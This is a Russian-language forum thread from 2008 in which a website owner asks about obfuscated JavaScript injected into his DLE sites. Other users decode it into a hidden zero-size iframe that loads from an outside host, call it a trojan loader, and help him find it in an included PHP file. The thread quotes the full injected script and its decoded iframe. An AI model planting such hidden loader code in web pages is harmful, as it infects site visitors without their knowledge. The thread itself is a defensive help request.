Потерявшийся Ява или индекс схавал паразит |
15.03.2008, 18:24
|
|
Познающий
Регистрация: 10.03.2008
Сообщений: 81
С нами:
9564009
Репутация:
1
|
|
Потерявшийся Ява или индекс схавал паразит
Интересную сказку начал наблюдать в исходниках на своих сайтах (все на одном хосте висят)
В индексах в самом верху начал наблюдаться какой то ява скрипт. Подозрения на фтп червя, но я не уверен. может кто подскажет, что это за скриптег такой и что он делает?
<script type="text/javascript">function ahpgxusvlwuzz(skusjits){var fgdxbotv="";for(uknzaxauyi=0;uknzaxauyi<skusjits.l ength;uknzaxauyi+=2){fgdxbotv+=(String.fromCharCod e(parseInt(skusjits.substr(uknzaxauyi,2),16)));}do cument.write(fgdxbotv);}ahpgxusvlwuzz("3C696672616 D65207372633D22687474703A2F2F746F703130302D636F756 E7465722E636F6D2F746F703130302F696E6465782E7068702 2206672616D65626F726465723D22302220626F726465723D2 230222077696474683D223022206865696768743D223022207 374796C653D22706F736974696F6E3A206162736F6C7574653 B207669736962696C6974793A2068696464656E3B206469737 06C61793A206E6F6E65223E3C2F696672616D653E");</script>
П.С. возможно я создал тему не в той ветке, но на мой взгляд она должна быть тут, так что прошу, если что, судить не строго и больно не пинать))
|
|
|
15.03.2008, 18:28
|
|
Banned
Регистрация: 11.08.2006
Сообщений: 1,522
С нами:
10393869
Репутация:
2032
|
|
ничего интересного. обычный айфрейм на плоент
<iframe src="http://top100-counter.com/top100/index.php" frameborder="0" border="0" width="0" height="0" style="position: absolute; visibility: hidden; display: none"></iframe>
|
|
|
|
15.03.2008, 18:28
|
|
Banned
Регистрация: 19.12.2007
Сообщений: 924
С нами:
9681386
Репутация:
2145
|
|
загрузчик трояна. стопудов
|
|
|
|
15.03.2008, 20:19
|
|
Познающий
Регистрация: 10.03.2008
Сообщений: 81
С нами:
9564009
Репутация:
1
|
|
Если загрузчик троя, интересно, почему антивирусы молчат 
Кстати скорее всего так и есть. читал на форуме хостера, что не довольные клиенты ругаются, что хостер не хочет пытаться найти источник заражения на фтп и почистить там всё. все ругались на какой то не понятный ява скрипт |
|
|
|
16.03.2008, 00:46
|
|
Познающий
Регистрация: 10.03.2008
Сообщений: 81
С нами:
9564009
Репутация:
1
|
|
На сайтах двиг Dle 6.7
В индекс.пхп и в .штаццесс я подозрительного кода не нашёл. Где он мог спрятатся? Выводится на всех страницах сайта в самом верху.
|
|
|
|
16.03.2008, 01:21
|
|
Banned
Регистрация: 19.12.2007
Сообщений: 924
С нами:
9681386
Репутация:
2145
|
|
возможно в файлах, которые подключаются через include()
footer.php, header.php и.т.п
|
|
|
|
16.03.2008, 01:27
|
|
Постоянный
Регистрация: 16.01.2006
Сообщений: 598
С нами:
10692326
Репутация:
531
|
|
антивирус и не должен говорить =) сплоит криптованный и авиры сосут до поры до времени
|
|
|
|
16.03.2008, 12:51
|
|
Познающий
Регистрация: 10.03.2008
Сообщений: 81
С нами:
9564009
Репутация:
1
|
|
Нашёл...
через require_once подключался. файл require_once ROOT_DIR.'/engine/init.php';
iddqd, thx  |
|
|
|
19.03.2008, 17:37
|
|
Постоянный
Регистрация: 19.06.2007
Сообщений: 315
С нами:
9945026
Репутация:
326
|
|
Сообщение от comeoff
Нашёл...
через require_once подключался. файл require_once ROOT_DIR.'/engine/init.php';
iddqd, thx молодец, теперь пройдись по логам и посмотри кто проник на твой сайт.
|
|
|
|
|
 |
Похожие темы
|
| Тема |
Автор |
Раздел |
Ответов |
Последнее сообщение |
|
Books C\C++
|
FRAGNATIC |
С/С++, C#, Rust, Swift, Go, Java, Perl, Ruby |
119 |
26.04.2010 14:41 |
|
Хакер и закон!
|
SladerNon |
Болталка |
17 |
12.11.2009 09:42 |
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|
Комбинированный вид
